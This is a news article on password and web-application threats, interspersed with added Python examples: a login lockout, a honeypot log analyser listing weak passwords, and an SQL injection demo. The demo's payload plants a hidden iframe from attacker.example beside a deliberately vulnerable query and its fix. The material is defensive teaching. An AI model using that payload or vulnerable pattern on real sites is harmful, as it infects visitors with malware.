
Microsoft, security firms warn of password meltdown

Robert Westervelt, News Editor

Microsoft and several security firms are warning users to protect their account credentials during the holiday shopping season, as more people shop for gifts online.

The warning is also aimed at enterprises, which can expect more attacks against their Web applications from hackers eager to find website flaws, either to steal lucrative customer data such as credit card numbers or to set up drive-by attacks that infect visitors. Automated tools are also on the rise, letting fraudsters run brute force password attacks. If successful, they can buy items with another person's account or probe for website errors that expose a back-end customer database.

Many of these threats have become commonplace. The FBI's Internet Crime Complaint Center (IC3) logs many complaints from people who have experienced online auction fraud. Phishing scams that use social engineering to dupe people into handing over their account credentials are also popular and lucrative for cybercriminals. The bottom line, experts say, is to practice login password security: change account passwords regularly and always be on guard for attacks.

"The historical problems have not gone away, but many of the relevant merchants have become much better at dealing with those problems," said Sean Brady, a global expert on issues and mitigation strategies related to online fraud at Bedford, Mass.-based RSA, the security division of EMC Corp. "The problem is that merchants want to build trust with their customers while at the same time customers need to be wary about their online activities."

Brady said many online merchants have processes in place to guard against old-school brute force password attacks. CAPTCHA technologies offer a reasonable challenge-response test to confirm that an automated tool isn't attempting to log in or create new accounts. Many merchants also reset passwords after a small number of failed access attempts, a method widely used and effective in limiting brute force attacks.
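As an added illustration (not code from the article, from RSA or from any merchant named here), the Python sketch below shows the failed-attempt logic Brady describes: consecutive failures are counted per account and, past a threshold, the account refuses every login, even one with the right password, until a cooling-off period has passed. The in-memory user store, the PBKDF2 hashing parameters, the threshold of five attempts and the 15-minute lockout are assumptions chosen for illustration.

```python
"""Lockout after repeated failed logins (added example, not the article's code).

Counts consecutive failures per account and refuses all logins for a
cooling-off period once a threshold is hit, so a scripted guesser gains
nothing even if one of its later guesses is right.  User store, hashing
parameters and thresholds are assumptions chosen for illustration.
"""
import hashlib
import hmac
import os
import time
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256; the iteration count is an illustrative assumption."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest


@dataclass
class LoginGuard:
    max_failures: int = 5            # consecutive failures before the account locks (assumption)
    lockout_seconds: float = 900.0   # 15-minute cooling-off period (assumption)
    users: Dict[str, Tuple[bytes, bytes]] = field(default_factory=dict)   # name -> (salt, digest)
    failures: Dict[str, Tuple[int, float]] = field(default_factory=dict)  # name -> (count, locked_until)

    def register(self, username: str, password: str) -> None:
        self.users[username] = hash_password(password)

    def login(self, username: str, password: str, now: Optional[float] = None) -> str:
        """Return 'ok', 'denied' or 'locked'.

        Unknown users and wrong passwords both get 'denied', so the form does
        not confirm which usernames exist.  A locked account rejects even the
        correct password until the lockout expires; an expired lockout resets
        the counter so one later slip does not re-lock the account at once.
        """
        now = time.time() if now is None else now
        count, locked_until = self.failures.get(username, (0, 0.0))
        if now < locked_until:
            return "locked"
        if locked_until:                      # earlier lockout has expired: count afresh
            count, locked_until = 0, 0.0
        record = self.users.get(username)
        if record is not None:
            salt, digest = record
            _, candidate = hash_password(password, salt)
            if hmac.compare_digest(candidate, digest):
                self.failures.pop(username, None)   # success clears the counter
                return "ok"
        count += 1
        locked_until = now + self.lockout_seconds if count >= self.max_failures else 0.0
        self.failures[username] = (count, locked_until)
        return "locked" if locked_until else "denied"


if __name__ == "__main__":
    guard = LoginGuard(max_failures=3, lockout_seconds=60)
    guard.register("alice", "correct horse battery staple")
    t0 = 1_000.0
    for guess in ("123456", "password", "admin"):
        print(guess, "->", guard.login("alice", guess, t0))          # denied, denied, locked
    print("right password while locked ->",
          guard.login("alice", "correct horse battery staple", t0 + 1))   # locked
    print("right password after lockout ->",
          guard.login("alice", "correct horse battery staple", t0 + 61))  # ok
```

Keying the counter on the account rather than only on the source address matters because credential-guessing tools rotate through proxies; and returning the same answer for an unknown user and a wrong password keeps the login form from doubling as a username oracle.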

But Microsoft is warning that technology alone can only go so far in protecting accounts from password cracker programs. The software giant deployed a network protocol analyzer and a phony FTP server (a honeypot) to log the automated attacks it received, including those designed to steal account credentials. An analysis of the data collected since July found that people are making it far too easy for attackers.

The statistics showed many people still using "admin" or "administrator" as their username, suggesting that default usernames and passwords remain in use. Easy-to-crack passwords were common too: "123456" turned up often, as did the simple word "password." Default or easily guessed usernames and passwords, combined with automated credential-guessing tools, make the attacker's job all too easy, Microsoft said.

"One attacker tried more than 400,000 username and password combinations," according to a blog entry on password protection by Microsoft researchers Francis Allan Tan Seng and Andrei Saygo at the Microsoft Malware Protection Center's Threat Research and Response blog. The researchers highlighted an automated tool that can test password strength.

"You should take good care of what username and password you're choosing," the researchers wrote. "Having a super strong password is not enough. From time to time, you need to change it, especially when you feel that your account has been compromised."
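To show what the two signals from Microsoft's honeypot look like in a log, here is an added example (not Microsoft's code): it parses constructed FTP-style login records, picks out any source that cycles through many username/password combinations, and lists which accepted logins used a default username or a top-N password. The log format, every line of the sample, the thresholds and the weak-credential lists are assumptions; a honeypot can afford to record the attempted password, which a production server should never do.

```python
"""Brute-force detection over honeypot FTP logs (added example, not Microsoft's code).

The log format and every line in SAMPLE_LOG are constructed for illustration;
a honeypot can record the attempted password, a production server must not.
Thresholds and the weak-credential lists are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# One attempt per line: <timestamp> <source ip> USER <name> PASS <password> OK|FAIL
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d{1,3}(?:\.\d{1,3}){3}) "
    r"USER (?P<user>\S+) PASS (?P<pw>\S+) (?P<result>OK|FAIL)$"
)

DEFAULT_USERNAMES = {"admin", "administrator", "root", "ftp", "test", "anonymous"}
WEAK_PASSWORDS = {"123456", "password", "admin", "1234", "qwerty", "letmein"}

# Constructed sample: one scripted guesser (203.0.113.5), one single low-volume
# probe that stays under the per-source threshold, one default-account hit,
# and a line that is not a login record at all.
SAMPLE_LOG = """\
2009-11-20T10:01:02Z 203.0.113.5 USER admin PASS 123456 FAIL
2009-11-20T10:01:02Z 203.0.113.5 USER admin PASS password FAIL
2009-11-20T10:01:03Z 203.0.113.5 USER administrator PASS 123456 FAIL
2009-11-20T10:01:03Z 203.0.113.5 USER root PASS toor FAIL
2009-11-20T10:01:04Z 203.0.113.5 USER admin PASS admin OK
2009-11-20T10:05:40Z 198.51.100.7 USER backup PASS Tr0ub4dor&3 FAIL
2009-11-20T10:06:11Z 198.51.100.9 USER ftp PASS ftp OK
this line is not a login record
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one login attempt, or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(log_text: str, brute_threshold: int = 4) -> dict:
    """Flag sources that try many credentials, and accepted logins that used
    a default username or a top-N password."""
    per_src = defaultdict(lambda: {"attempts": 0, "users": set(), "passwords": set(), "successes": 0})
    weak_logins: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        s = per_src[ev["src"]]
        s["attempts"] += 1
        s["users"].add(ev["user"])
        s["passwords"].add(ev["pw"])
        if ev["result"] == "OK":
            s["successes"] += 1
            if ev["user"].lower() in DEFAULT_USERNAMES or ev["pw"].lower() in WEAK_PASSWORDS:
                weak_logins.append((ev["src"], ev["user"], ev["pw"]))
    brute_forcers = {
        src: {
            "attempts": s["attempts"],
            "distinct_users": len(s["users"]),
            "distinct_passwords": len(s["passwords"]),
            "succeeded": s["successes"] > 0,
        }
        for src, s in per_src.items()
        if s["attempts"] >= brute_threshold
    }
    return {"brute_forcers": brute_forcers, "weak_successful_logins": weak_logins}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for src, info in report["brute_forcers"].items():
        print(f"{src}: {info['attempts']} attempts, {info['distinct_users']} usernames, "
              f"{info['distinct_passwords']} passwords, got in: {info['succeeded']}")
    for src, user, pw in report["weak_successful_logins"]:
        print(f"weak credentials accepted: {user}/{pw} from {src}")
```

The per-source count catches the noisy guesser but not the probe from 198.51.100.7, which tried once; tools that spread a default-credential list across many hosts stay under any per-source threshold, so a second aggregation per target username across all sources is worth adding in practice.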

For enterprises, Secure Sockets Layer (SSL), which encrypts a user's session, is no protection against most automated attacks: it secures the channel, not the application behind it. Tom Cross, a member of IBM Internet Security Systems' X-Force research team, said SQL injection vulnerabilities are by far the favorite target of attackers. SQL injection exploits detected across the IBM ISS sensor network rose from a few thousand events per day in spring 2008 to more than 500,000 events per day by summer 2009.

"Generally speaking, these attacks inject iFrames into underlying databases and the hope is that [the malicious code] will get redisplayed to innocent users that view those webpages," Cross said. "What these guys are trying to do is get to something on a legitimate website that redirects users to their exploit toolkit."

A successful SQL injection attack on a legitimate site can infect hundreds of customers with malware before it is detected, including keylogger Trojans that record keystrokes when a user logs into an account. Earlier this year, the United States Computer Emergency Readiness Team (US-CERT) warned of the Gumblar malware, which spread to thousands of websites through stolen FTP credentials, vulnerable Web applications and poor configuration settings. The automated code set up drive-by attacks on the legitimate sites, leaving site owners and security researchers scrambling to get the sites repaired or temporarily shut down.
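The mechanism Cross describes, as an added example that is not code from IBM ISS, US-CERT or any site named in the article: a product page that splices its request parameter into SQL, a constructed payload that appends a hidden iframe to every stored description through a stacked UPDATE, the bound-parameter version that neutralises it, and a scan for injected markup. The table layout, the payload and the attacker host (attacker.example) are assumptions. Python's sqlite3.execute() refuses stacked statements, so the vulnerable path uses executescript() to model database drivers that run everything the attacker appends.

```python
"""Stored iframe via SQL injection, and the parameterized fix (added example;
not code from IBM ISS, US-CERT or any site named in the article).

Builds a throwaway SQLite product catalogue, shows a product page that
splices the request parameter into its SQL, runs a constructed payload (a
stacked UPDATE that appends a hidden iframe to every stored description),
then shows the bound-parameter version and a scan for injected markup.
Table layout, payload and attacker host are assumptions.  sqlite3.execute()
refuses stacked statements, so the vulnerable path uses executescript() to
model database drivers that run everything the attacker appends.
"""
import sqlite3
from typing import List, Tuple

ATTACKER_IFRAME = '<iframe src="http://attacker.example/kit" width="0" height="0"></iframe>'

# What arrives in the page's "id" query parameter.  The leading 1 keeps the
# page's own SELECT valid; the semicolon starts the attacker's statement.
PAYLOAD = "1; UPDATE products SET description = description || '" + ATTACKER_IFRAME + "'"


def fresh_catalogue() -> sqlite3.Connection:
    """Two-row catalogue in memory (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);"
        "INSERT INTO products VALUES (1, 'Kettle', 'Boils water.');"
        "INSERT INTO products VALUES (2, 'Toaster', 'Browns bread.');"
    )
    return conn


def show_product_vulnerable(conn: sqlite3.Connection, product_id: str) -> List[Tuple[str, str]]:
    """VULNERABLE: untrusted text becomes part of the SQL.  Returns what the page would render."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id + ";"
    conn.executescript(sql)                              # runs the attacker's UPDATE as well
    return conn.execute(sql.split(";")[0]).fetchall()    # the SELECT the page meant to run


def show_product_safe(conn: sqlite3.Connection, product_id: str) -> List[Tuple[str, str]]:
    """Hardened: validate the type, then bind the value so it is never parsed as SQL."""
    try:
        pid = int(product_id)
    except ValueError:
        return []
    return conn.execute("SELECT name, description FROM products WHERE id = ?", (pid,)).fetchall()


def find_injected_rows(conn: sqlite3.Connection) -> List[Tuple[int, str]]:
    """Post-incident check: rows whose text columns now carry markup a catalogue should not contain."""
    return conn.execute(
        "SELECT id, name FROM products WHERE description LIKE '%<iframe%' "
        "OR description LIKE '%<script%' ORDER BY id"
    ).fetchall()


if __name__ == "__main__":
    conn = fresh_catalogue()
    print("before:", find_injected_rows(conn))                    # []
    print("rendered:", show_product_vulnerable(conn, PAYLOAD))   # Kettle row now ends in the iframe
    print("after:", find_injected_rows(conn))                     # [(1, 'Kettle'), (2, 'Toaster')]
    conn = fresh_catalogue()
    print("safe:", show_product_safe(conn, PAYLOAD), find_injected_rows(conn))   # [] []
```

The rendered row is the point: the site's own template faithfully prints the poisoned description, so every later visitor loads the attacker's iframe from a page that looks entirely legitimate. Binding the parameter removes the injection regardless of what the request contains; the integer check in front of it is defence in depth, not the fix itself.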

"The bad guys are looking for a sweet spot; a website that doesn't have the security sophistication as some of the other networks do," Cross said. "Unfortunately the kind of automation they're using is making it easier for them to look for thousands of those sweet spots."

Another way to keep a watchful eye on Web applications and the traffic flowing into a website is a Web application firewall (WAF). Art of Defence, a distributed Web application firewall vendor based in Germany, launched Hyperguard SaaS in April, targeting users of Amazon's EC2 cloud infrastructure.

Alex Meisel, chief technology officer and co-founder of Art of Defence, said the plug-in gives merchants another layer of security over their Web applications. In addition to common WAF functions, the Hyperguard software includes URL encryption and a Web authentication framework. A trial version of the plug-in is free to merchants, and the firm plans to sell an enterprise-class version next year, Meisel said.

"Companies are finding technology and education is an important part of a layered security strategy," Meisel said. "In the cloud, the magnitude of the problem is much greater because everything is held in one place. People can lose their data at the blink of an eye."